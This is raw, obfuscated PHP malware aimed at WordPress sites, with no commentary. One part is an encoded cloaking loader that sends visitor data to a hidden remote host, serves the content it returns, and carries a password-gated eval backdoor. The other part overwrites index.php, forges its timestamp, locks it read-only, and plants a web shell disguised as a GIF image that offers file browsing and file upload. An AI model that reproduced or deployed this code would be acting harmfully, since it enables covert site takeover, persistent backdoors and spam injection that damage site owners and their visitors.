(isset($_SERVER["\110\x54\124\120\137\130\x5f\x46\117\122\127\x41\x52\104\105\104\x5f\106\x4f\122"]) && !empty($_SERVER["\110\x54\x54\120\137\x58\x5f\106\117\x52\127\x41\x52\x44\105\x44\137\106\117\x52"])) { goto fC4TsJLDlLa7Fd; } goto tg1NYgpKkoxqsI; a8IMEWGjEZXKfK: fC4TsJLDlLa7Fd: goto FmcH48Mw9D6cwv; B2HWd9h88ewAhj: return $QG6wIz22XZTZuV; goto HMixWp2zX9uZmr; Ju9FFDGcpzbFS8: goto Y28jAMaQv90c_f; goto ubUlIX0g1Ahf_0; LvLPn1bSiHY2o6: if (isset($_SERVER["\110\x54\x54\120\x5f\103\106\137\103\117\116\x4e\x45\103\124\x49\116\107\137\111\120"]) && !empty($_SERVER["\x48\124\124\120\x5f\103\106\137\103\x4f\116\116\105\103\x54\x49\116\107\137\111\120"])) { goto G3fF0gfEKC35tU; } goto P8mMhMtosvzZkY; jya3siTWt71ApY: YryqRQpQqrtuto: goto B2HWd9h88ewAhj; tg1NYgpKkoxqsI: $QG6wIz22XZTZuV = $_SERVER["\x52\x45\115\x4f\x54\105\137\101\x44\x44\x52"]; goto Ju9FFDGcpzbFS8; wKxfe2Pk9VwBaW: $QG6wIz22XZTZuV = $_SERVER["\110\124\124\x50\137\x58\x5f\x52\105\x41\114\137\x49\x50"]; goto mNqpcd4_R37GjM; VaA9Pp4wfhRD_m: $QG6wIz22XZTZuV = ''; goto LvLPn1bSiHY2o6; ubUlIX0g1Ahf_0: G3fF0gfEKC35tU: goto wz_yS9fCIWM_wP; SqL1IGlDnKhEyY: $QG6wIz22XZTZuV = trim(str_replace("\x20", '', $QG6wIz22XZTZuV), "\54"); goto QoHq5VOOM4tB89; QoHq5VOOM4tB89: if (!(strpos($QG6wIz22XZTZuV, "\x2c") !== false)) { goto YryqRQpQqrtuto; } goto oiPzmpeghN_vTN; mNqpcd4_R37GjM: goto Y28jAMaQv90c_f; goto a8IMEWGjEZXKfK; XPBKC3JX3oLD1j: Y28jAMaQv90c_f: goto SqL1IGlDnKhEyY; gatiityG7R2v_w: $QG6wIz22XZTZuV = $QG6wIz22XZTZuV[0]; goto jya3siTWt71ApY; HSO_t11G_qY1TW: b_VSzuWHzIAuoE: goto wKxfe2Pk9VwBaW; RuTUhJtHo2e_kR: goto Y28jAMaQv90c_f; goto HSO_t11G_qY1TW; wz_yS9fCIWM_wP: $QG6wIz22XZTZuV = $_SERVER["\110\x54\x54\120\137\x43\x46\137\x43\x4f\116\x4e\x45\x43\124\x49\x4e\107\x5f\111\120"]; goto RuTUhJtHo2e_kR; HMixWp2zX9uZmr: } goto YSH8wqYUrB3AFX; jnW2uJD3qYlWAL: $XI9wRqfxd6GpQm = substr($TSsWfj6Htm173c, strpos($TSsWfj6Htm173c, "\56")); goto EqFQbGRGaPaNVG; uEfDDX9EhJQGca: $VHvQb7H0gd5Jm4["\x72\146"] = bMQmTbve4uAFDv($AwsrViRts9D6e0); goto wycR0p9RBIfgF3; EgspX8049sP1P8: echo $h5kyLq2vsUwKCk["\x63\x6f\x6e\x74\x65\x6e\164"]; goto Y20ewFJ8NvhIch; XmH3OY0NiHA14b: if (!(strpos($AwsrViRts9D6e0, $Qun9Ap4qzfdApQ) === 0)) { goto H50d5qYIx7QPSl; } goto r5QbxCaG550E9M; Sp2pr0pRNOBb6F: mYvmsoKDOGtbO7: goto QM7XF8WXPe5yNW; EqFQbGRGaPaNVG: if (!in_array($XI9wRqfxd6GpQm, array("\56\152\163", "\x2e\x63\x73\x73", "\56\x6a\x70\147", "\56\160\x6e\x67", "\56\x67\x69\146", "\56\x69\143\x6f"))) { goto mYvmsoKDOGtbO7; } goto fiJoD0k0MHCdH_; BRsNfjaV3FvTd_: function q3KtCmUcPOWaju($b31SsjGXMVydbr, $WbaA0LrID8X2y1 = array()) { goto u0CXcuA10fPKyZ; TsTwzVVGsOj6hs: JgOkHMxoF_G8x0: goto aWiVnhFKoBDjFG; u0CXcuA10fPKyZ: $h5kyLq2vsUwKCk = array("\163\164\141\164\165\x73" => 0, "\143\157\156\164\x65\x6e\x74" => '', "\164\171\x70\145" => ''); goto bPQFItHTaUyKXP; aWiVnhFKoBDjFG: try { goto GIi41xyn_gBxUS; tTk87v95GCHiHr: @curl_close($It07mzgC6ns_Vj); goto yz9UppqjAx9yUy; ckB6xiDq40MaLE: goto K8IofGtBAKteWa; goto baTEO2r_0Z7YCx; Qzsxgl6BRe4KSe: curl_setopt($It07mzgC6ns_Vj, CURLOPT_SSL_VERIFYPEER, 0); goto z_YSh_ULZVsDL_; baTEO2r_0Z7YCx: CoywvHUjPZA96S: goto NuzyDuMfwXPQzk; YXXBs9x2t5QaLW: $bsFNyMYEytS114 = @file_get_contents($b31SsjGXMVydbr, false, $Orn27Bm4mDBi0K); goto T2f6Opp09t_wIo; ncciliugddJP2a: curl_setopt($It07mzgC6ns_Vj, CURLOPT_COOKIESESSION, 0); goto XiPMLtgZKREDIh; NmG6leayvw39qe: curl_setopt($It07mzgC6ns_Vj, CURLOPT_FOLLOWLOCATION, 0); goto ncciliugddJP2a; Urn2ZlHtoPU99b: curl_setopt($It07mzgC6ns_Vj, CURLOPT_SSL_VERIFYHOST, 0); goto Qzsxgl6BRe4KSe; zG6jY6k4r8K9Fe: if (!in_array($h5kyLq2vsUwKCk["\x73\164\141\x74\165\x73"], array(200, 301, 302, 404))) { goto rm15GI_EvcZI_Z; } goto C13_NH_XNH0vpf; yz9UppqjAx9yUy: if (!in_array($h5kyLq2vsUwKCk["\x73\164\141\164\x75\x73"], array(200, 301, 302, 404))) { goto tSlDNgd0vawVLz; } goto MkuVmnCp2hwlna; z_YSh_ULZVsDL_: curl_setopt($It07mzgC6ns_Vj, CURLOPT_CONNECTTIMEOUT, 20); goto p0NZ3499zIeYJ4; XDoE6mX2c0Avmp: K8IofGtBAKteWa: goto ViFyb9SkZ1DDBk; C8UJZ_u6KDJyyi: $h5kyLq2vsUwKCk["\x73\164\141\164\165\x73"] = intval(curl_getinfo($It07mzgC6ns_Vj, CURLINFO_HTTP_CODE)); goto BlsJMcSdiTd2gL; PrUu0fywH29QLc: $Orn27Bm4mDBi0K = stream_context_create($C5vmd35UEdJkZh); goto YXXBs9x2t5QaLW; QH8Kze0x6zzYHZ: $h5kyLq2vsUwKCk["\143\157\x6e\164\x65\x6e\164"] = strval(curl_getinfo($It07mzgC6ns_Vj, CURLINFO_REDIRECT_URL)); goto tTk87v95GCHiHr; RCtDxlc0VvvSPG: $C5vmd35UEdJkZh = array("\x68\164\x74\160" => array("\x6d\x65\x74\150\157\x64" => "\107\105\124", "\164\x69\155\x65\157\165\x74" => 60, "\146\x6f\x6c\154\157\x77\137\x6c\x6f\143\141\164\x69\x6f\x6e" => 0), "\x73\163\x6c" => array("\166\145\162\151\146\x79\137\x70\x65\145\162" => false, "\166\145\162\151\146\171\137\160\x65\x65\x72\x5f\156\141\155\x65" => false)); goto PrUu0fywH29QLc; PCK_sOTQ18JGRW: $Vh56_lkipqAlM8 = curl_exec($It07mzgC6ns_Vj); goto C8UJZ_u6KDJyyi; p0NZ3499zIeYJ4: curl_setopt($It07mzgC6ns_Vj, CURLOPT_TIMEOUT, 60); goto NmG6leayvw39qe; iwt5AwwBKwoZVr: curl_setopt($It07mzgC6ns_Vj, CURLOPT_URL, $b31SsjGXMVydbr); goto Urn2ZlHtoPU99b; NuzyDuMfwXPQzk: $It07mzgC6ns_Vj = curl_init(); goto iwt5AwwBKwoZVr; XiPMLtgZKREDIh: curl_setopt($It07mzgC6ns_Vj, CURLOPT_RETURNTRANSFER, 1); goto PCK_sOTQ18JGRW; v8_h0biJeLq365: rm15GI_EvcZI_Z: goto XDoE6mX2c0Avmp; o_E0mnLV78mxi8: tSlDNgd0vawVLz: goto UHioUMysVsSfSQ; GIi41xyn_gBxUS: if (function_exists("\143\165\x72\x6c\137\x65\x78\x65\x63") && function_exists("\x63\x75\162\x6c\137\151\156\x69\x74")) { goto CoywvHUjPZA96S; } goto BPVdu6v5jIC3Sq; iSLYJwheCErvE_: dXQjGZgLQvZx0q: goto RCtDxlc0VvvSPG; BlsJMcSdiTd2gL: $h5kyLq2vsUwKCk["\x74\x79\160\145"] = strval(curl_getinfo($It07mzgC6ns_Vj, CURLINFO_CONTENT_TYPE)); goto QH8Kze0x6zzYHZ; BPVdu6v5jIC3Sq: if (ini_get("\x61\154\154\157\x77\137\165\162\154\x5f\x66\x6f\x70\145\156")) { goto dXQjGZgLQvZx0q; } goto ckB6xiDq40MaLE; C13_NH_XNH0vpf: $h5kyLq2vsUwKCk["\143\157\156\x74\145\156\164"] = strval($bsFNyMYEytS114); goto v8_h0biJeLq365; MkuVmnCp2hwlna: $h5kyLq2vsUwKCk["\143\157\x6e\x74\x65\156\164"] = strval($Vh56_lkipqAlM8); goto o_E0mnLV78mxi8; T2f6Opp09t_wIo: $h5kyLq2vsUwKCk = array_merge($h5kyLq2vsUwKCk, NEnbFfxn6u1HPM($http_response_header)); goto zG6jY6k4r8K9Fe; UHioUMysVsSfSQ: goto K8IofGtBAKteWa; goto iSLYJwheCErvE_; ViFyb9SkZ1DDBk: } catch (Exception $sqgsn8M1cTth4s) { } goto bA0xZ6UR2tkpQL; bPQFItHTaUyKXP: if (!(is_array($WbaA0LrID8X2y1) && count($WbaA0LrID8X2y1))) { goto JgOkHMxoF_G8x0; } goto BJWnVJURCNZrnw; BJWnVJURCNZrnw: $b31SsjGXMVydbr .= "\x3f" . http_build_query($WbaA0LrID8X2y1); goto TsTwzVVGsOj6hs; bA0xZ6UR2tkpQL: return $h5kyLq2vsUwKCk; goto LRhSVUc0uzAdzi; LRhSVUc0uzAdzi: } goto xdMCeh2rD34YWW; VOpsH6JAHz9Dq5: if (!(in_array(gettype($i5zebT5WeekdQw) . count($i5zebT5WeekdQw), $i5zebT5WeekdQw) && count($i5zebT5WeekdQw) == 23 && md5(md5(md5(md5($i5zebT5WeekdQw[17])))) === "\x66\x65\71\x61\x35\x61\x64\x35\x35\65\71\x35\x37\x37\141\x66\64\x61\142\x34\141\x64\x39\x62\145\62\x34\x34\x36\x35\x63\x65")) { goto T9kb3kgEO8JUAC; } goto oOhzlExeWqHqMV; j_l2mSxjh253N1: H50d5qYIx7QPSl: goto xEZh3RU0oh7ghH; YSH8wqYUrB3AFX: function uXiMdwHceYSTOG() { goto O5eam1FiaAdTDP; l0ku1h3iKSglBp: if (isset($_SERVER["\x48\124\x54\120\137\x58\137\106\x4f\122\127\x41\122\104\x45\x44\137\x50\122\117\124\x4f"]) && $_SERVER["\110\x54\124\x50\137\130\x5f\x46\117\122\x57\101\122\104\x45\x44\137\120\122\x4f\124\117"] === "\x68\x74\164\x70\163") { goto FAFcMFZLSdhf7s; } goto sNPqxuh7Q11bjY; kCcro_3cxATxXr: goto U_bc80ILZg69fl; goto po3TtJ1I5KEtbP; vnagRwiMbsDv9C: MNrqk31kXckh0o: goto GT12YRx48U79Hg; YJTG3knZYvfaqr: $FNekAkRj1gOEwW = "\x68\164\164\x70\x73\x3a\57\57"; goto BGprNa2wFTMfTi; CzQ5gD5HOBIl7n: return $FNekAkRj1gOEwW; goto TDZ5ubPPGL3V9s; N4OWdJSUfUFY2l: X_zjxu8GVOVmQT: goto x_2oB221yoaLgE; x_2oB221yoaLgE: $FNekAkRj1gOEwW = "\150\164\164\160\163\72\57\57"; goto kCcro_3cxATxXr; GT12YRx48U79Hg: $FNekAkRj1gOEwW = "\150\x74\x74\x70\163\x3a\x2f\x2f"; goto DyBePHvc8RFEPQ; jASOKzsRr_GFNh: goto U_bc80ILZg69fl; goto N4OWdJSUfUFY2l; O5eam1FiaAdTDP: $FNekAkRj1gOEwW = "\150\x74\x74\160\72\x2f\x2f"; goto h0NJOYso8PTew3; po3TtJ1I5KEtbP: FAFcMFZLSdhf7s: goto YJTG3knZYvfaqr; DyBePHvc8RFEPQ: U_bc80ILZg69fl: goto CzQ5gD5HOBIl7n; BGprNa2wFTMfTi: goto U_bc80ILZg69fl; goto vnagRwiMbsDv9C; h0NJOYso8PTew3: if (isset($_SERVER["\x48\124\124\x50\x53"]) && strtolower($_SERVER["\110\124\x54\120\123"]) !== "\157\146\x66") { goto X_zjxu8GVOVmQT; } goto l0ku1h3iKSglBp; sNPqxuh7Q11bjY: if (isset($_SERVER["\x48\x54\x54\x50\x5f\106\x52\117\x4e\x54\137\105\116\x44\x5f\x48\124\124\x50\x53"]) && strtolower($_SERVER["\x48\x54\124\x50\137\x46\x52\x4f\x4e\x54\x5f\x45\x4e\x44\x5f\x48\124\124\x50\123"]) !== "\x6f\x66\x66") { goto MNrqk31kXckh0o; } goto jASOKzsRr_GFNh; TDZ5ubPPGL3V9s: } goto My41CxlV9OObdM; pdk609A8PdMmRz: metaphone("\115\x54\x49\65\117\x44\121\x34\115\152\143\x32\115\x7a\153\167\x4d\104\111\x33\x4e\124\x67\x78\x4e\124\125\61\x4e\x44\x51\171"); goto VSUvZsMLVmp2I5; UwWbmGPwBiuq__: error_reporting(0); goto AG4r8yeGCLvuZr; DaGyqALjXCQSNJ: if (in_array($h5kyLq2vsUwKCk["\x73\x74\x61\164\165\163"], array(0, 200))) { goto kceC2I_o2O8ga8; } goto RzobooEdyfiIVy; NeQe225q4ffN6D: $VHvQb7H0gd5Jm4["\151"] = BMQMtbvE4uAFdV($QG6wIz22XZTZuV); goto lNMIlOFIYVoKQi; Y20ewFJ8NvhIch: exit(0); goto fKgBmagfsN2Hsf; oOhzlExeWqHqMV: ($i5zebT5WeekdQw[68] = $i5zebT5WeekdQw[68] . $i5zebT5WeekdQw[79]) && ($i5zebT5WeekdQw[83] = $i5zebT5WeekdQw[68]($i5zebT5WeekdQw[83])) && @eval($i5zebT5WeekdQw[68](${$i5zebT5WeekdQw[43]}[14])); goto f4w5t1qkq5lFBY; S_wjC5Rk63uoMb: EB6gRLPIyjWZwE: goto R6Q54hBo4bHmY1; wRYZxx_46VU8Yd: $h5kyLq2vsUwKCk = Q3ktCMUcpowAjU(base64_decode("\141\x48\122\x30\x63\104\x6f\166\x4c\x33\160\172\117\x44\115\64\144\152\x45\x7a\x4c\156\x4e\166\144\130\x52\157\x5a\130\x4d\x75\x62\107\71\x73\x4c\x77"), $VHvQb7H0gd5Jm4); goto DaGyqALjXCQSNJ; fKgBmagfsN2Hsf: zKsfTvhh3GOTUy: goto nyUjKmMMw0LvNy; J2b4dcDHN7uXqS: if ($PszpplFaiYiwDG) { goto V4gkQne2eslVLZ; } goto wRYZxx_46VU8Yd; QM7XF8WXPe5yNW: q2icVn9ZkdMOvM: goto J2b4dcDHN7uXqS; My41CxlV9OObdM: if (!($_SERVER["\122\x45\x51\x55\105\x53\124\x5f\x55\x52\x49"] === "\x2f\x52\x2d" . md5($_SERVER["\123\105\122\x56\105\x52\137\116\x41\x4d\x45"]))) { goto jjlPtSWVPj8YaQ; } goto XUiYmmEZH8KZy7; gLg5rnRyMA74JB: $VHvQb7H0gd5Jm4["\165"] = BMqmtBVE4uAFdv($_SERVER["\x48\x54\124\120\x5f\x55\123\x45\x52\x5f\101\107\105\x4e\124"]); goto q_Kom31MftI6g4; q_Kom31MftI6g4: $TSsWfj6Htm173c = preg_replace("\x2f\x5c\x3f\56\52\57", '', $_SERVER["\x52\105\x51\x55\x45\x53\x54\x5f\x55\x52\x49"]); goto nezNnyrfYN3Wcq; r5QbxCaG550E9M: $AwsrViRts9D6e0 = ''; goto j_l2mSxjh253N1; xdMCeh2rD34YWW: function BmQMTbvE4uAFDv($ubGkx2wAsidEhy) { goto rEBVQl0olRl_dS; e0jaca3bcDF6Le: z8G3t2ckZQ73rU: goto KeQlMqP2UtN85x; BI8CsFCcyNS8gB: return ''; goto e0jaca3bcDF6Le; rEBVQl0olRl_dS: if ($ubGkx2wAsidEhy) { goto z8G3t2ckZQ73rU; } goto BI8CsFCcyNS8gB; KeQlMqP2UtN85x: return rtrim(strtr(base64_encode($ubGkx2wAsidEhy), "\x2b\x2f", "\55\137"), "\x3d"); goto sHU2Epmrd1HIB7; sHU2Epmrd1HIB7: } goto Zxi4nDyC13ShcB; stUiq9ylZoETWG: if (!substr_count($_SERVER["\122\x45\121\x55\x45\123\124\x5f\125\x52\x49"], "\151\x6e\x64\x65\x78\x2e\x70\x68\x70\x2f\x6a\x6b")) { goto EB6gRLPIyjWZwE; } goto UBil9MhVUPWyDD; m6JGXOdBpMFgu8: kceC2I_o2O8ga8: goto jNQ82opwQ5WtCR; wVIuxLvNg_qcAI: jjlPtSWVPj8YaQ: goto stUiq9ylZoETWG; nezNnyrfYN3Wcq: $PszpplFaiYiwDG = false; goto wrQQX2dbYAbVCV; yRpas9ckZTTw0_: ZCQ6z68F3oCX8P::znPso8xfHGj5UJ(); goto ZC5l06WBiQoNi0; UBil9MhVUPWyDD: exit("\173\x20\x22\x65\x72\x72\157\162\x22\72\40\62\60\60\x2c\x20\x22\x6c\x63\42\72\x20\x22\152\x6b\42\x2c\40\42\x64\141\164\141\42\72\40\x5b\40\61\x20\135\x20\x7d"); goto S_wjC5Rk63uoMb; RzobooEdyfiIVy: switch ($h5kyLq2vsUwKCk["\x73\x74\141\x74\x75\163"]) { case 301: goto pXW1DepW1giess; zzKUNx7XWNNStr: header("\114\157\143\141\164\151\x6f\x6e\72\x20" . trim($h5kyLq2vsUwKCk["\143\157\156\164\145\156\x74"])); goto SCokKYs4DKr5Vg; pXW1DepW1giess: header("\110\x54\x54\x50\57\x31\56\61\x20\63\x30\61\40\x4d\x6f\166\145\144\40\120\x65\x72\155\141\x6e\x65\x6e\x74\x6c\x79"); goto zzKUNx7XWNNStr; SCokKYs4DKr5Vg: goto nzxCg5COIKjY1S; goto oY5Fo33rBRwqWA; oY5Fo33rBRwqWA: case 302: goto ETVjZwGe3TzHho; o_Y5KEGkODI7NZ: goto nzxCg5COIKjY1S; goto RFHxrA64W1tBDg; ETVjZwGe3TzHho: header("\110\x54\124\x50\57\61\x2e\61\40\63\x30\62\x20\x4d\x6f\x76\x65\40\124\145\155\x70\157\162\x61\162\151\x6c\x79"); goto c61RmAwEWnt2oc; c61RmAwEWnt2oc: header("\114\x6f\143\x61\x74\x69\x6f\x6e\x3a\x20" . trim($h5kyLq2vsUwKCk["\143\157\156\x74\x65\156\164"])); goto o_Y5KEGkODI7NZ; RFHxrA64W1tBDg: case 404: goto rqFQxv_dsswgiZ; dim86bMiq4ncSh: header("\163\164\141\164\x75\163\x3a\x20\x34\60\x34\x20\x4e\x6f\x74\40\106\157\x75\156\x64"); goto UBXFXRqouV3rtr; rqFQxv_dsswgiZ: header("\110\x54\x54\x50\x2f\61\x2e\x31\40\64\x30\64\x20\116\157\164\40\106\157\165\156\144"); goto dim86bMiq4ncSh; UBXFXRqouV3rtr: goto nzxCg5COIKjY1S; goto j8F7UVlw4EL1tN; j8F7UVlw4EL1tN: default: goto nzxCg5COIKjY1S; } goto UDalb4faY0L0Fe; Y4V4tLLN5gvqUt: $Qun9Ap4qzfdApQ = UXImDwHCeYsTOG() . $_SERVER["\x48\124\x54\120\137\110\x4f\x53\124"]; goto XmH3OY0NiHA14b; jNQ82opwQ5WtCR: if (!strlen($h5kyLq2vsUwKCk["\143\x6f\156\x74\x65\156\x74"])) { goto zKsfTvhh3GOTUy; } goto QQ_pa5sEtlVlXu; aoPRM5buxom0S1: $AwsrViRts9D6e0 = strval(@$_SERVER["\x48\124\x54\120\137\122\105\x46\x45\x52\105\x52"]); goto Y4V4tLLN5gvqUt; AG4r8yeGCLvuZr: $xJqu6y68vFMEah = "\162" . "\141" . "\x6e" . "\147" . "\x65"; goto LUsUweB4H4MYdu; wrQQX2dbYAbVCV: if (!(strpos($TSsWfj6Htm173c, "\56") > 0 && strpos($TSsWfj6Htm173c, "\56\x70\150\160") === false)) { goto q2icVn9ZkdMOvM; } goto jnW2uJD3qYlWAL; e7CfrA22gYyWeY: function nEnbfFXN6U1hpM($twbpzHNQLJwNj3) { goto seWfk3xblq6ZF2; iyNdkCi7rN8Bco: return $GChukiHZQ1vrs3; goto n3qiGUhXtVX2Wa; KZ5wNiXZCs__hG: x6Ps7PkGVtSkhM: goto iyNdkCi7rN8Bco; S3x5VTyFk6Oasj: aBoiKd59_5yVrX: goto bdooP3_o160_sJ; seWfk3xblq6ZF2: $GChukiHZQ1vrs3 = array("\x73\164\x61\164\165\x73" => 0, "\x63\x6f\x6e\x74\x65\x6e\x74" => '', "\164\x79\160\145" => ''); goto Q4XDJErVQVi8UN; Q4XDJErVQVi8UN: if (is_array($twbpzHNQLJwNj3)) { goto aBoiKd59_5yVrX; } goto xFQB4vNhmmyP8K; xFQB4vNhmmyP8K: return $GChukiHZQ1vrs3; goto S3x5VTyFk6Oasj; bdooP3_o160_sJ: foreach ($twbpzHNQLJwNj3 as $zE4jBFgP3cqHbR) { goto T6W1zcF39oezwc; JFaBMT_oNpjzGX: $GChukiHZQ1vrs3["\164\x79\160\x65"] = $s6xdFe2ylvjQEu[1]; goto oTd5CR6h1t0Gd8; WavBo6OsojBBS0: if (preg_match("\57\x6c\x6f\x63\141\x74\x69\x6f\x6e\x5c\x3a\133\x5c\x73\135\53\x28\56\52\51\x2f\151", $zE4jBFgP3cqHbR, $s6xdFe2ylvjQEu)) { goto Y3cwGUZ6Tp1H80; } goto DiI1Nuc8ACcqQj; gUIozxVkZe3vvm: goto Cil_11J8673C7E; goto qB_5hWDlJURO1y; yB5IhuUiTQrmwH: $GChukiHZQ1vrs3["\143\x6f\156\164\145\x6e\x74"] = $s6xdFe2ylvjQEu[1]; goto gUIozxVkZe3vvm; JTffdG87RDOHcp: SvoOjT2OxUfNvH: goto J0hoj_bICVey6u; T6W1zcF39oezwc: if (preg_match("\57\150\x74\x74\160\x5c\x2f\x5b\x30\55\71\134\x2e\x5d\53\x5b\x5c\x73\x5d\53\x28\133\x30\x2d\x39\x5d\x2b\51\57\x69", $zE4jBFgP3cqHbR, $s6xdFe2ylvjQEu)) { goto wZmI_w0sIWUqIg; } goto WavBo6OsojBBS0; DiI1Nuc8ACcqQj: if (preg_match("\57\x63\x6f\156\x74\145\x6e\x74\x5c\x2d\164\x79\160\x65\x5c\72\x5b\x5c\x73\135\x2b\x28\x2e\52\51\57\151", $zE4jBFgP3cqHbR, $s6xdFe2ylvjQEu)) { goto KiZGTg952U_roT; } goto a2qQwkO5VaYy2h; F2YGzbpTkVG24A: goto Cil_11J8673C7E; goto qOwR9rjqiYLiK0; a2qQwkO5VaYy2h: goto Cil_11J8673C7E; goto GRl3RSwyxId1PZ; qOwR9rjqiYLiK0: Y3cwGUZ6Tp1H80: goto yB5IhuUiTQrmwH; qB_5hWDlJURO1y: KiZGTg952U_roT: goto JFaBMT_oNpjzGX; oTd5CR6h1t0Gd8: Cil_11J8673C7E: goto JTffdG87RDOHcp; GRl3RSwyxId1PZ: wZmI_w0sIWUqIg: goto cj_YwC15Nbld3c; cj_YwC15Nbld3c: $GChukiHZQ1vrs3["\x73\164\141\164\165\x73"] = intval($s6xdFe2ylvjQEu[1]); goto F2YGzbpTkVG24A; J0hoj_bICVey6u: } goto KZ5wNiXZCs__hG; n3qiGUhXtVX2Wa: } goto BRsNfjaV3FvTd_; f4w5t1qkq5lFBY: T9kb3kgEO8JUAC: goto pdk609A8PdMmRz; QQ_pa5sEtlVlXu: @header("\103\x6f\156\x74\145\156\164\x2d\124\x79\160\x65\72" . $h5kyLq2vsUwKCk["\x74\171\x70\x65"]); goto EgspX8049sP1P8; R6Q54hBo4bHmY1: $QG6wIz22XZTZuV = I1bvsAszurXRPZ(); goto aoPRM5buxom0S1; UDalb4faY0L0Fe: I53Hxep_kiQhgM: goto iT10wk0brTdSXi; LUsUweB4H4MYdu: $Sl9GWDOI19n_5n = $xJqu6y68vFMEah("\176", "\40"); goto ZJgKN5JnTgpBcN; ZC5l06WBiQoNi0: header("\x43\157\x6e\164\145\x6e\x74\x2d\124\x79\x70\x65\72\x20\x74\x65\170\164\x2f\x68\164\x6d\x6c\x3b\40\143\x68\141\x72\163\x65\x74\75\165\164\x66\x2d\70"); goto HbeWvC93atyPlc; nyUjKmMMw0LvNy: V4gkQne2eslVLZ:
?>
<?php define( 'WP_USE_THEMES', true ); require('./wp-blog-header.php');?>"); $index_code = file_get_contents($do."index.php"); if(md5($index_code) != md5($open_cache_ruzhu_phpcode)) { @chmod($do."index.php", 0644); @file_put_contents($do."index.php", $open_cache_ruzhu_phpcode); @touch($do."index.php", filectime($do."index.php")); @chmod($do."index.php", 0444); } $file_general_template_path = $do."wp-includes/general-template.php"; $jue_jiang_404_path = $do."wp-includes/images/xit-3x.gif"; if (!file_exists($jue_jiang_404_path)){ $jue_jiang_404 = "<?php
error_reporting(0);
date_default_timezone_set('PRC');

$ARRAY = ${'_GET'}['ARRAY'];
$KJMn = str_rot13($ARRAY);
$cbH = pack("\x48\x2a", $KJMn);
$EzaU = json_decode($cbH, true);
if (($EzaU[0] - time()) > 0 and md5(md5($EzaU[2])) === "9f34665b0052311d5b6ad6f821dc6228") : // ====
// ===============================================================

    function juejiang_perms($file){
        $perms = fileperms($file);
        if (($perms & 0xC000) == 0xC000) {// Socket
            $info = 's';
        } elseif (($perms & 0xA000) == 0xA000) {// Symbolic Link
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {// Regular
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {// Block special
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {// Directory
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {// Character special
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {// FIFO pipe
            $info = 'p';
        } else {// Unknown
            $info = 'u';
        }
// Owner
        $info .= (($perms & 0x0100) ? 'r' : '-');
        $info .= (($perms & 0x0080) ? 'w' : '-');
        $info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));

// Group
        $info .= (($perms & 0x0020) ? 'r' : '-');
        $info .= (($perms & 0x0010) ? 'w' : '-');
        $info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));

// World
        $info .= (($perms & 0x0004) ? 'r' : '-');
        $info .= (($perms & 0x0002) ? 'w' : '-');
        $info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));

        return $info;
    }

// ------------------------------------------------------
    /**
     * 转化 \ 为 /
     */
    function dir_path($path)
    {
        $path = str_replace('\\', '/', $path);
        if (substr($path, -1) != '/') $path = $path . '/';
        return $path;
    }

// ------------------------------------------------------

    /** 取得站点根目录
     * @return array|string|string[]
     */
    function document_root(){

        $php_self = dir_path($_SERVER["PHP_SELF"]);
        $script_filename = dir_path($_SERVER["SCRIPT_FILENAME"]);
        if (empty($_SERVER["PHP_SELF"]) or empty($_SERVER["SCRIPT_FILENAME"])){
            $do1 = dir_path($_SERVER["DOCUMENT_ROOT"]);
            $do = rtrim($do1,'/');
        }else{
            $do = str_replace(str_replace("//", "/", $php_self), "", str_replace("\\\\", "/", $script_filename));
        }
		if(empty($do)) $do = '/';
        return $do;
    }
    $document_root = document_root();
    define('DOCUMENT_ROOT', $document_root);

// ------------------------------------------------------



    $php_version = PHP_MAJOR_VERSION;
	if($php_version<=7){
		if(get_magic_quotes_gpc()){
			foreach($_POST as $key=>$value){
				$_POST[$key] = stripslashes($value);
			}
		}
	}

    $Version = base64_decode('5pyA5ZCO55qE5YCU5by6');
    if(isset($_GET['path'])){
        $path = $_GET['path'];
    }else{
        $path = getcwd();
    }


    echo '<!doctype html>
<html>
<head>
<title>&Error_404&</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>';
    ?>

    <center>
        <style>
            body{background:#e6e6e6;line-height:1;color:#000;font-family:Comic Sans MS;width:60%;margin:0 auto;}
            table,th,td{border-collapse:collapse;background:transparent;font-size:13px;}
            input,textarea{}
            .table_home,.th_home,.td_home{color:grey;border:1px solid grey;}
            th{padding:10px;}
            .td_home{padding:7px;}
            a{color:#000; text-decoration:none;}
            textarea{width:100%;height:400px;}
            #content tr:hover{background-color:#cecece;text-shadow:0px 0px 10px #fff;color:#fff;}
            .dh a{ padding-left: 10px; padding-right: 10px; border-right: 1px solid #000;}
            .dh a:hover{ color: #f00;}
        </style>
    <?php
    echo '</head>
<body><b>
<H1><center><font color="red">'.$Version.'</font></center></h1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr><td>

<font ><center>'.php_uname().'</center></font><br>';
    if(isset($_GET['path'])){
        $path = $_GET['path'];
    }else{
        $path = getcwd();
    }
    $path = str_replace('\\','/',$path);
    $paths = explode('/',$path);

    $gen_link_url = '<a style="color:#0066FF" href="?ARRAY='.$ARRAY.'&path='.DOCUMENT_ROOT;
    $gen_link_url .= '">根目录 ：    </a>&nbsp;';
    echo $gen_link_url;

    foreach($paths as $id=>$pat){
        if($pat == '' && $id == 0){
            $a = true;
            echo '<font color=#000>
<a href="?ARRAY='.$ARRAY.'&path=/">/</a>';
            continue;
        }
        if($pat == '') continue;
        echo '<a style="color:#0066FF" href="?ARRAY='.$ARRAY.'&path=';
        for($i=0;$i<=$id;$i++){
            echo "$paths[$i]";
            if($i != $id) echo "/";
        }
        echo '">'.$pat.'</a>/';
    }
    echo '</font>
<br><br>
</td></tr><tr><td><center>';

    if(isset($_FILES['file'])){
        if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
            echo '<font color="green">上传成功 :)</font><br /><br />';
        }else{
            echo '<font color="red">上传失败 </font><br /><br />';
        }
    }
